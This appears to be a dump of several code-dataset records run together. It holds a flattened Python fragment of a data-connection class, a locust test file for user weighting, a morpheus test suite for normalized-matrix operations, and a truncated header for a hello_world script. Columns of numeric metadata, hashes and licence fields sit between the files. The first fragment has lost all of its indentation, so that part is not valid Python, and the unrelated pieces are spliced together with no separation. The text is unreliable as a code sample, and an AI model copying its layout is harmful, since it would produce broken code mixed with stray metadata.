elif isinstance(data1, ICloud3D) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType) and (data5 == None):
self._binned = False
cloud = data1
xIndex = data2
yIndex = data3
zIndex = data4
for entryNumber in range(cloud.entries()):
center = [None, None, None]
center[xIndex] = cloud.valueX(entryNumber)
center[yIndex] = cloud.valueY(entryNumber)
center[zIndex] = cloud.valueZ(entryNumber)
centers.append(center)
weights.append(None)
errorsP.append(None)
errorsM.append(None)
elif isinstance(data1, IDataPointSet) and isinstance(data2, types.IntType) and isinstance(data3, types.IntType) and isinstance(data4, types.IntType) and isinstance(data5, types.IntType):
self._binned = True
dataPointSet = data1
xIndex = data2
yIndex = data3
zIndex = data4
valIndex = data5
for offset in range(dataPointSet.size()):
dataPoint = dataPointSet.point(offset)
x = dataPoint.coordinate(xIndex)
y = dataPoint.coordinate(yIndex)
z = dataPoint.coordinate(zIndex)
val = dataPoint.coordinate(valIndex)
centers.append([x.value(), y.value(), z.value()])
weights.append(val.value())
errorsP.append(val.errorPlus()**2)
errorsM.append(val.errorMinus()**2)
else:
raise TypeError('Invalid arguments.')
self._connection = [centers, weights, errorsP, errorsM]
self._range.append(IRangeSet())
self._range.append(IRangeSet())
self._range.append(IRangeSet())
def createConnection(self, data1 = None, data2 = None, data3 = None):
centers = []
weights = []
errorsP = []
errorsM = []
if isinstance(data1, ITuple) and hasattr(data2, '__iter__') and (data3 == None):
self._binned = False
iTuple = data1
colData = data2
length = iTuple.rows()
if length == -1:
raise TypeError('This ITuple has no row.')
iTuple.start()
if isinstance(colData[0], types.StringTypes):
columnIndices = []
evaluatorCs = []
for columnName in colData:
columnIndex = iTuple.findColumn(columnName)
columnIndices.append(columnIndex)
columnType = iTuple.columnType(columnIndex)
if columnType == PTypes.Double:
evaluatorCs.append(iTuple.getDouble)
elif columnType == PTypes.Float:
evaluatorCs.append(iTuple.getFloat)
elif columnType == PTypes.Int:
evaluatorCs.append(iTuple.getInt)
elif columnType == PTypes.Short:
evaluatorCs.append(iTuple.getShort)
elif columnType == PTypes.Long:
evaluatorCs.append(iTuple.getLong)
elif columnType == PTypes.Char:
evaluatorCs.append(iTuple.getChar)
elif columnType == PTypes.Byte:
evaluatorCs.append(iTuple.getByte)
elif columnType == PTypes.Boolean:
evaluatorCs.append(iTuple.getBoolean)
elif columnType == PTypes.String:
evaluatorCs.append(iTuple.getString)
elif columnType == PTypes.Object:
evaluatorCs.append(iTuple.getObject)
elif columnType == PTypes.Tuple:
evaluatorCs.append(iTuple.getTuple)
else:
raise TypeError('Illegal column type %s' % columnType)
while iTuple.next():
center = []
for i, columnIndex in enumerate(columnIndices):
center.append(evaluatorCs[i](columnIndex))
centers.append(center)
weights.append(None)
errorsP.append(None)
errorsM.append(None)
elif isinstance(colData[0], IEvaluator):
evaluatorCs = []
for evaluator in colData:
evaluator.initialize(iTuple)
evaluatorCs.append(evaluator.evaluateDouble)
while iTuple.next():
center = []
for evaluatorC in evaluatorCs:
center.append(evaluatorC())
centers.append(center)
weights.append(None)
errorsP.append(None)
errorsM.append(None)
else:
raise TypeError('Illegal list data type.')
self._connection = [centers, weights, errorsP, errorsM]
for i in range(len(colData)):
self._range.append(IRangeSet())
elif isinstance(data1, IDataPointSet) and hasattr(data2, '__iter__') and isinstance(data3, types.IntType):
self._binned = True
dataPointSet = data1
indices = data2
valIndex = data3
for offset in range(dataPointSet.size()):
dataPoint = dataPointSet.point(offset)
val = dataPoint.coordinate(valIndex)
center = []
if indices == []:
center.append(offset)
else:
for i in indices:
center.append(dataPoint.coordinate(i).value())
centers.append(center)
weights.append(val.value())
errorsP.append(val.errorPlus()**2)
errorsM.append(val.errorMinus()**2)
self._connection = [centers, weights, errorsP, errorsM]
for i in range(len(indices)):
self._range.append(IRangeSet())
else:
raise TypeError('Invalid arguments.')
def reset(self):
self._connection = []
self._range = []
self._binned = None
self._dataDescription = ''
def dimension(self):
return len(self._range)
def dataDescription(self):
return self._dataDescription
def range(self, i):
try:
return self._range[i]
except IndexError:
raise TypeError('The Range[%d] does not exist.' % i)
| 35.887931
| 188
| 0.69325
| 1,870
| 16,652
| 6.132086
| 0.093583
| 0.016482
| 0.023546
| 0.021976
| 0.80954
| 0.755211
| 0.746926
| 0.734368
| 0.700706
| 0.665736
| 0
| 0.016193
| 0.187845
| 16,652
| 463
| 189
| 35.965443
| 0.831707
| 0
| 0
| 0.705336
| 0
| 0
| 0.01111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020882
| false
| 0
| 0.037123
| 0.00464
| 0.067285
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5aaca73fd77168cc61f1abe7535ffbe52c651777
| 8,001
|
py
|
Python
|
locust/test/test_distribution.py
|
AliAnsariArshad/locust
|
e6a0e94943fad197df540cc79b357500d1f04f1b
|
[
"MIT"
] | null | null | null |
locust/test/test_distribution.py
|
AliAnsariArshad/locust
|
e6a0e94943fad197df540cc79b357500d1f04f1b
|
[
"MIT"
] | null | null | null |
locust/test/test_distribution.py
|
AliAnsariArshad/locust
|
e6a0e94943fad197df540cc79b357500d1f04f1b
|
[
"MIT"
] | null | null | null |
import time
import unittest
from locust import User
from locust.distribution import weight_users
class TestDistribution(unittest.TestCase):
def test_distribution_no_user_classes(self):
user_classes_count = weight_users(user_classes=[], user_count=0)
self.assertDictEqual(user_classes_count, {})
user_classes_count = weight_users(user_classes=[], user_count=1)
self.assertDictEqual(user_classes_count, {})
def test_distribution_equal_weights_and_fewer_amount_than_user_classes(self):
class User1(User):
weight = 1
class User2(User):
weight = 1
class User3(User):
weight = 1
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=0)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=1)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=2)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 0})
def test_distribution_equal_weights(self):
class User1(User):
weight = 1
class User2(User):
weight = 1
class User3(User):
weight = 1
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=3)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=4)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=5)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=6)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 2, "User3": 2})
def test_distribution_unequal_and_unique_weights_and_fewer_amount_than_user_classes(self):
class User1(User):
weight = 1
class User2(User):
weight = 2
class User3(User):
weight = 3
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=0)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=1)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=2)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 1, "User3": 1})
def test_distribution_unequal_and_unique_weights(self):
class User1(User):
weight = 1
class User2(User):
weight = 2
class User3(User):
weight = 3
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=3)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=4)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=5)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=6)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 3})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=10)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 3, "User3": 5})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=11)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 4, "User3": 5})
def test_distribution_unequal_and_non_unique_weights_and_fewer_amount_than_user_classes(self):
class User1(User):
weight = 1
class User2(User):
weight = 2
class User3(User):
weight = 2
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=0)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 0, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=1)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 1, "User3": 0})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=2)
self.assertDictEqual(user_classes_count, {"User1": 0, "User2": 1, "User3": 1})
def test_distribution_unequal_and_non_unique_weights(self):
class User1(User):
weight = 1
class User2(User):
weight = 2
class User3(User):
weight = 2
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=3)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 1})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=4)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 1, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=5)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 2, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=6)
self.assertDictEqual(user_classes_count, {"User1": 1, "User2": 3, "User3": 2})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=10)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 4, "User3": 4})
user_classes_count = weight_users(user_classes=[User1, User2, User3], user_count=11)
self.assertDictEqual(user_classes_count, {"User1": 2, "User2": 5, "User3": 4})
def test_distribution_large_number_of_users(self):
class User1(User):
weight = 5
class User2(User):
weight = 55
class User3(User):
weight = 37
class User4(User):
weight = 2
class User5(User):
weight = 97
class User6(User):
weight = 41
class User7(User):
weight = 33
class User8(User):
weight = 19
class User9(User):
weight = 19
class User10(User):
weight = 34
class User11(User):
weight = 78
class User12(User):
weight = 76
class User13(User):
weight = 28
class User14(User):
weight = 62
class User15(User):
weight = 69
for user_count in range(1044523783783, 1044523783783 + 1000):
ts = time.perf_counter()
user_classes_count = weight_users(
user_classes=[
User1,
User2,
User3,
User4,
User5,
User6,
User7,
User8,
User9,
User10,
User11,
User12,
User13,
User14,
User15,
],
user_count=user_count,
)
delta_ms = 1e3 * (time.perf_counter() - ts)
self.assertEqual(sum(user_classes_count.values()), user_count)
self.assertLessEqual(delta_ms, 100)
| 36.040541
| 98
| 0.611549
| 951
| 8,001
| 4.872766
| 0.087277
| 0.208891
| 0.193353
| 0.132931
| 0.830168
| 0.814631
| 0.814631
| 0.808373
| 0.783556
| 0.763271
| 0
| 0.068319
| 0.273716
| 8,001
| 221
| 99
| 36.20362
| 0.729134
| 0
| 0
| 0.518987
| 0
| 0
| 0.046869
| 0
| 0
| 0
| 0
| 0
| 0.183544
| 1
| 0.050633
| false
| 0
| 0.025316
| 0
| 0.291139
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5ab5cd0abd96d341534b4e7e4537ee747176cd97
| 16,860
|
py
|
Python
|
morpheus/test_normalized_matrix.py
|
amirsh/MorpheusPy
|
8eda959e71a3b377c3f6629802bad2bd4f5a5ee6
|
[
"Apache-2.0"
] | 12
|
2018-10-04T08:27:33.000Z
|
2022-01-11T15:41:29.000Z
|
morpheus/test_normalized_matrix.py
|
amirsh/MorpheusPy
|
8eda959e71a3b377c3f6629802bad2bd4f5a5ee6
|
[
"Apache-2.0"
] | 3
|
2020-09-22T16:18:51.000Z
|
2021-12-28T19:01:00.000Z
|
morpheus/test_normalized_matrix.py
|
amirsh/MorpheusPy
|
8eda959e71a3b377c3f6629802bad2bd4f5a5ee6
|
[
"Apache-2.0"
] | 4
|
2019-12-13T17:52:19.000Z
|
2021-12-17T12:43:44.000Z
|
# Copyright 2018 Side Li and Arun Kumar
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import scipy.sparse as sp
import sklearn.preprocessing as preprocess
from numpy.testing import (
run_module_suite, assert_equal, assert_almost_equal
)
import normalized_matrix as nm
import utils
class TestNormalizedMatrix(object):
s = np.matrix([[1.0, 2.0], [4.0, 3.0], [5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
k = [np.array([0, 1, 1, 0, 1])]
r = [np.matrix([[1.1, 2.2], [3.3, 4.4]])]
m = np.matrix([[1.0, 2.0, 1.1, 2.2],
[4.0, 3.0, 3.3, 4.4],
[5.0, 6.0, 3.3, 4.4],
[8.0, 7.0, 1.1, 2.2],
[9.0, 1.0, 3.3, 4.4]])
n_matrix = nm.NormalizedMatrix(s, r, k)
def test_add(self):
n_matrix = self.n_matrix
local_matrix = n_matrix + 1
assert_equal(local_matrix.ent_table, self.s + 1)
assert_equal(local_matrix.att_table[0], self.r[0] + 1)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix + np.matrix([1.0, 2.0, 1.1, 2.2])
assert_equal(local_matrix.ent_table, self.s + np.matrix([1.0, 2.0]))
assert_equal(local_matrix.att_table[0],
self.r[0] + np.matrix([1.1, 2.2]))
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = 1 + n_matrix
assert_equal(local_matrix.ent_table[0], 1 + self.s[0])
assert_equal(local_matrix.att_table[0], 1 + self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.matrix([1.0, 2.0, 1.1, 2.2]) + n_matrix
assert_equal(local_matrix.ent_table, np.matrix([1.0, 2.0]) + self.s)
assert_equal(local_matrix.att_table[0], np.matrix(
[1.1, 2.2]) + self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix + 1
local_matrix += 1
assert_equal(local_matrix.ent_table[0], 2 + self.s[0])
assert_equal(local_matrix.att_table[0], 2 + self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix + np.matrix([1.0, 2.0, 1.1, 2.2])
local_matrix += np.matrix([1.0, 2.0, 1.1, 2.2])
assert_equal(local_matrix.ent_table, self.s +
np.matrix([1.0, 2.0]) * 2)
assert_equal(local_matrix.att_table[0],
self.r[0] + np.matrix([1.1, 2.2]) * 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.add(n_matrix, 1)
assert_equal(local_matrix.ent_table, self.s + 1)
assert_equal(local_matrix.att_table[0], self.r[0] + 1)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.add(1, n_matrix)
assert_equal(local_matrix.ent_table, self.s + 1)
assert_equal(local_matrix.att_table[0], self.r[0] + 1)
assert_equal(local_matrix.kfkds[0], self.k[0])
def test_sub(self):
n_matrix = self.n_matrix
local_matrix = n_matrix - 1
assert_equal(local_matrix.ent_table[0], self.s[0] - 1)
assert_equal(local_matrix.att_table[0], self.r[0] - 1)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix - np.matrix([1.0, 2.0, 1.1, 2.2])
assert_equal(local_matrix.ent_table, self.s - np.matrix([1.0, 2.0]))
assert_equal(local_matrix.att_table[0],
self.r[0] - np.matrix([1.1, 2.2]))
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = 1 - n_matrix
assert_equal(local_matrix.ent_table[0], 1 - self.s[0])
assert_equal(local_matrix.att_table[0], 1 - self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.matrix([1.0, 2.0, 1.1, 2.2]) - n_matrix
assert_equal(local_matrix.ent_table, np.matrix([1.0, 2.0]) - self.s)
assert_equal(local_matrix.att_table[0], np.matrix(
[1.1, 2.2]) - self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix - 1
local_matrix -= 1
assert_equal(local_matrix.ent_table[0], self.s[0] - 2)
assert_equal(local_matrix.att_table[0], self.r[0] - 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix - np.matrix([1.0, 2.0, 1.1, 2.2])
local_matrix -= np.matrix([1.0, 2.0, 1.1, 2.2])
assert_equal(local_matrix.ent_table, self.s -
np.matrix([1.0, 2.0]) * 2)
assert_equal(local_matrix.att_table[0],
self.r[0] - np.matrix([1.1, 2.2]) * 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.subtract(n_matrix, 1)
assert_equal(local_matrix.ent_table, self.s - 1)
assert_equal(local_matrix.att_table[0], self.r[0] - 1)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.subtract(1, n_matrix)
assert_equal(local_matrix.ent_table, 1 - self.s)
assert_equal(local_matrix.att_table[0], 1 - self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
def test_mul(self):
n_matrix = self.n_matrix
local_matrix = n_matrix * 2
assert_equal(local_matrix.ent_table[0], self.s[0] * 2)
assert_equal(local_matrix.att_table[0], self.r[0] * 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = 2 * n_matrix
assert_equal(local_matrix.ent_table[0], 2 * self.s[0])
assert_equal(local_matrix.att_table[0], 2 * self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = 2 * n_matrix
local_matrix *= 2
assert_equal(local_matrix.ent_table[0], 4 * self.s[0])
assert_equal(local_matrix.att_table[0], 4 * self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.multiply(n_matrix, 2)
assert_equal(local_matrix.ent_table, self.s * 2)
assert_equal(local_matrix.att_table[0], self.r[0] * 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.multiply(2, n_matrix)
assert_equal(local_matrix.ent_table, 2 * self.s)
assert_equal(local_matrix.att_table[0], 2 * self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
def test_div(self):
n_matrix = self.n_matrix
local_matrix = n_matrix / 2
assert_equal(local_matrix.ent_table, self.s / 2)
assert_equal(local_matrix.att_table[0], self.r[0] / 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix / np.matrix([1.0, 2.0, 1.1, 2.2])
assert_equal(local_matrix.ent_table, self.s / np.matrix([1.0, 2.0]))
assert_equal(local_matrix.att_table[0],
self.r[0] / np.matrix([1.1, 2.2]))
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = 2 / n_matrix
assert_equal(local_matrix.ent_table, 2 / self.s)
assert_equal(local_matrix.att_table[0], 2 / self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.matrix([1.0, 2.0, 1.1, 2.2]) / n_matrix
assert_equal(local_matrix.ent_table, np.matrix([1.0, 2.0]) / self.s)
assert_equal(local_matrix.att_table[0], np.matrix(
[1.1, 2.2]) / self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix / 2
local_matrix /= 2
assert_equal(local_matrix.ent_table, self.s / 4)
assert_equal(local_matrix.att_table[0], self.r[0] / 4)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = n_matrix / np.matrix([1.0, 2.0, 1.1, 2.2])
local_matrix /= np.matrix([1.0, 2.0, 1.1, 2.2])
assert_equal(local_matrix.ent_table, self.s /
np.power(np.matrix([1.0, 2.0]), 2))
assert_equal(
local_matrix.att_table[0], self.r[0] / np.power(np.matrix([1.1, 2.2]), 2))
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.divide(n_matrix, 2)
assert_equal(local_matrix.ent_table, self.s / 2)
assert_equal(local_matrix.att_table[0], self.r[0] / 2)
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.divide(2, n_matrix)
assert_equal(local_matrix.ent_table, 2 / self.s)
assert_equal(local_matrix.att_table[0], 2 / self.r[0])
assert_equal(local_matrix.kfkds[0], self.k[0])
def test_pow(self):
n_matrix = self.n_matrix
local_matrix = n_matrix ** 2
assert_equal(local_matrix.ent_table, np.power(self.s, 2))
assert_equal(local_matrix.att_table[0], np.power(self.r[0], 2))
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.power(n_matrix, 2)
assert_equal(local_matrix.ent_table, np.power(self.s, 2))
assert_equal(local_matrix.att_table[0], np.power(self.r[0], 2))
assert_equal(local_matrix.kfkds[0], self.k[0])
local_matrix = np.power(2, n_matrix)
assert_equal(local_matrix.ent_table, np.power(2, self.s))
assert_equal(local_matrix.att_table[0], np.power(2, self.r[0]))
assert_equal(local_matrix.kfkds[0], self.k[0])
def test_transpose(self):
n_matrix = self.n_matrix
assert_equal(n_matrix.T.T.sum(axis=0), n_matrix.sum(axis=0))
assert_equal(np.array_equal(n_matrix.T.sum(
axis=0), n_matrix.sum(axis=0)), False)
def test_inverse(self):
n_matrix = self.n_matrix
assert_almost_equal(n_matrix.I, self.n_matrix.I)
def test_row_sum(self):
n_matrix = self.n_matrix
assert_almost_equal(n_matrix.sum(axis=1), self.m.sum(axis=1))
def test_row_sum_trans(self):
n_matrix = nm.NormalizedMatrix(self.s, self.r, self.k, trans=True)
assert_almost_equal(n_matrix.sum(axis=1), self.m.T.sum(axis=1))
def test_col_sum(self):
n_matrix = self.n_matrix
assert_almost_equal(n_matrix.sum(axis=0), self.m.sum(axis=0))
def test_row_col_trans(self):
n_matrix = nm.NormalizedMatrix(self.s, self.r, self.k, trans=True)
assert_almost_equal(n_matrix.sum(axis=0), self.m.T.sum(axis=0))
def test_sum(self):
n_matrix = self.n_matrix
assert_almost_equal(n_matrix.sum(), self.m.sum())
def test_lmm(self):
n_matrix = self.n_matrix
x = np.matrix([[1.0], [2.0], [3.0], [4.0]])
assert_equal(n_matrix * x, self.m * x)
def test_lmm_trans(self):
n_matrix = self.n_matrix.T
x = np.matrix([[1.0], [2.0], [3.0], [4.0], [5.0]])
assert_almost_equal(n_matrix * x, self.m.T * x)
def test_rmm(self):
n_matrix = self.n_matrix
x = np.matrix([[1.0, 2.0, 3.0, 4.0, 5.0]])
assert_almost_equal(x * n_matrix, x * self.m)
def test_rmm_trans(self):
n_matrix = self.n_matrix
x = np.matrix([[1.0, 2.0, 3.0, 4.0]])
assert_equal(x * n_matrix.T, x * self.m.T)
def test_cross_prod(self):
n_matrix = self.n_matrix.T * self.n_matrix
assert_almost_equal(n_matrix, self.m.T * self.m)
n_matrix = np.multiply(self.n_matrix.T, self.n_matrix)
assert_almost_equal(n_matrix, self.m.T * self.m)
s = np.matrix([[1.0, 2.0], [4.0, 3.0], [
5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
k = [np.array([0, 1, 1, 0, 1]), np.array([0, 1, 1, 1, 0])]
r = [np.matrix([[1.1, 2.2], [3.3, 4.4]]),
np.matrix([[0.1, 0.2], [0.3, 0.4]])]
n_matrix = nm.NormalizedMatrix(s, r, k)
m = np.hstack([s, r[0][k[0]], r[1][k[1]]])
assert_almost_equal(n_matrix.T * n_matrix, m.T * m)
n_matrix = nm.NormalizedMatrix(s, [sp.coo_matrix(ri) for ri in r], k)
assert_almost_equal((n_matrix.T * n_matrix).toarray(), m.T * m)
def test_cross_prod_trans(self):
n_matrix = self.n_matrix.T
n_matrix = n_matrix.T * n_matrix
assert_almost_equal(n_matrix, self.m * self.m.T)
n_matrix = nm.NormalizedMatrix(
self.s, [sp.coo_matrix(att) for att in self.r], self.k).T
n_matrix = n_matrix.T * n_matrix
assert_almost_equal(n_matrix, self.m * self.m.T)
def test_cross_prod_hess(self):
n_matrix = self.n_matrix
assert_almost_equal(n_matrix._cross_prod_hess(
np.arange(4)), self.m.dot(np.arange(4).reshape(-1, 1) * self.m.T))
n_matrix = nm.NormalizedMatrix(
self.s, [sp.coo_matrix(att) for att in self.r], self.k)
assert_almost_equal(n_matrix._cross_prod_hess(
np.arange(4)), self.m.dot(np.arange(4).reshape(-1, 1) * self.m.T))
def test_cross_prod_hess_tran(self):
n_matrix = self.n_matrix.T
assert_almost_equal(n_matrix._cross_prod_hess(
np.arange(5)), self.m.T.dot(np.arange(5).reshape(-1, 1) * self.m))
n_matrix = nm.NormalizedMatrix(
self.s, [sp.coo_matrix(att) for att in self.r], self.k).T
assert_almost_equal(n_matrix._cross_prod_hess(
np.arange(5)), self.m.T.dot(np.arange(5).reshape(-1, 1) * self.m))
def test_max(self):
n_matrix = self.n_matrix
assert_equal(n_matrix.max(), self.m.max())
assert_equal(n_matrix.max(axis=0), self.m.max(axis=0))
def test_min(self):
n_matrix = self.n_matrix
assert_equal(n_matrix.min(), self.m.min())
assert_equal(n_matrix.min(axis=0), self.m.min(axis=0))
def test_mean(self):
n_matrix = self.n_matrix
assert_equal(n_matrix.mean(), self.m.mean())
assert_equal(n_matrix.mean(axis=0), self.m.mean(axis=0))
def test_var(self):
n_matrix = self.n_matrix
assert_equal(n_matrix.var(), self.m.var())
assert_equal(n_matrix.var(axis=0), self.m.var(axis=0))
def test_std(self):
n_matrix = self.n_matrix
assert_equal(n_matrix.std(), self.m.std())
assert_equal(n_matrix.std(axis=0), self.m.std(axis=0))
def test_mean_centering(self):
n_matrix = utils.mean_centering(self.n_matrix)
assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
self.m - self.m.mean())
n_matrix = utils.mean_centering(self.n_matrix, axis=0)
scaler = preprocess.StandardScaler(with_std=False)
scaler.fit(self.m)
assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
scaler.transform(self.m))
def test_standardization(self):
n_matrix = utils.standardization(self.n_matrix)
assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
(self.m - self.m.mean()) / self.m.std())
n_matrix = utils.standardization(self.n_matrix, axis=0)
scaler = preprocess.StandardScaler()
scaler.fit(self.m)
assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
scaler.transform(self.m))
def test_normalization(self):
n_matrix = utils.normalization(self.n_matrix)
assert_equal(np.hstack((n_matrix.ent_table, n_matrix.att_table[0][n_matrix.kfkds[0]])),
(self.m - self.m.mean()) / (self.m.max() - self.m.min()))
def test_imputation(self):
s = np.matrix([[1.0, np.nan], [4.0, 3.0], [
5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
k = self.k
r = [np.matrix([[np.nan, 2.2], [3.3, 4.4]])]
m = np.hstack([s, r[0][k[0]]])
m[np.isnan(m)] = np.nanmean(m)
n_matrix = nm.NormalizedMatrix(s, r, k)
assert_equal(utils.imputation(n_matrix).sum(axis=0), m.sum(axis=0))
s = np.matrix([[1.0, np.nan], [4.0, 3.0], [
5.0, 6.0], [8.0, 7.0], [9.0, 1.0]])
k = [np.array([0, 1, 1, 0, 1]), np.array([0, 1, 1, 0, 1])]
r = [np.matrix([[np.nan, 2.2], [3.3, 4.4]]),
np.matrix([[np.nan, 2.2], [3.3, 4.4]])]
m = np.hstack([s, r[0][k[0]], r[1][k[1]]])
mean = np.nanmean(m, axis=0)
inds = np.where(np.isnan(m))
m[inds] = np.take(mean, inds[1])
n_matrix = nm.NormalizedMatrix(s, r, k)
assert_almost_equal(utils.imputation(
n_matrix, axis=0).sum(axis=0), m.sum(axis=0))
if __name__ == "__main__":
run_module_suite()
| 39.300699
| 95
| 0.60344
| 2,845
| 16,860
| 3.362742
| 0.059051
| 0.118532
| 0.160552
| 0.220759
| 0.86443
| 0.829414
| 0.823247
| 0.80715
| 0.761054
| 0.745166
| 0
| 0.053303
| 0.237782
| 16,860
| 428
| 96
| 39.392523
| 0.691152
| 0.033155
| 0
| 0.455975
| 0
| 0
| 0.000491
| 0
| 0
| 0
| 0
| 0
| 0.427673
| 1
| 0.091195
| false
| 0
| 0.018868
| 0
| 0.128931
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
851594dabaf62af9a28e0b5be3244437b101c0fb
| 55
|
py
|
Python
|
examples/python/hello_world.py
|
12tqian/verification-helper-1
|
bfdb9a357b451a1385e5327417b3d17168ad2d51
|
[
"MIT"
] | 88
|
2020-05-03T03:29:01.000Z
|
2022-03-01T09:12:44.000Z
|
examples/python/hello_world.py
|
12tqian/verification-helper-1
|
bfdb9a357b451a1385e5327417b3d17168ad2d51
|
[
"MIT"
] | 158
|
2019-11-25T16:48:06.000Z
|
2020-05-02T14:39:56.000Z
|
examples/python/hello_world.py
|
12tqian/verification-helper-1
|
